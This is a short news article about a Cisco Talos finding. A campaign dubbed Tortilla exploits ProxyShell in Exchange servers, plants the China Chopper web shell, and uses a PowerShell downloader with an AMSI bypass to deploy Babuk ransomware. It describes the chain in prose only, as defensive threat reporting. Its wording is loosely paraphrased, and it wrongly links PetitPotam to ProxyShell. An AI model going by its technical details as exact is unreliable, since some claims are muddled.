Cybersecurity scholars have discovered a new malicious campaign that seeks to exploit already patched ProxyShell vulnerability in Microsoft Exchange mail servers, such as the Windows PetitPotam vulnerability, again highlighting the relevance of patching vulnerabilities in critical components. The new campaign hoping to locate unpatched fragile hosts to embed a variation of the Babuk ransomware was discovered by researchers from the Cisco Talos Threat Intelligence Suite using telemetry from the Cisco Secure product. "We rate it with moderate confidence that the initial infection vector is exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of the China Chopper web shell," the researchers share. According to scholars, the campaign finds primarily fragile servers in the US, with smaller numbers of infections also occurring in the UK, Germany, Ukraine, Finland, Brazil, Honduras and Thailand.
Unusual infection chain
Scholars point out that the threat actor behind this campaign, sometimes called Tortilla, is using a somewhat unusual infection chain. He first uses an intermediate unboxing module hosted on a pastebin.com clone called pastebin.pl. This intermediate unpacking step is first downloaded into memory already before the final payload execution. Examining the attack, researchers note that the downloader runs a hidden PowerShell command to connect to and retrieve another module of the actor's infrastructure, which appears to be hosted in Russia. The PowerShell command also performs an Anti-Malware Scanner Interface (AMSI) bypass to bypass endpoint protection, before finally incorporating the Babuk ransomware. "The leak of the Babuk vendor and its source code in July has contributed to its widespread availability, even to less experienced ransomware operators like Tortilla," the scholars conclude, asking users to embed defensive security. in the early stages. Stay alert on your computers with the help of the best endpoint protection tools and make sure you use these best backup software to recover your data.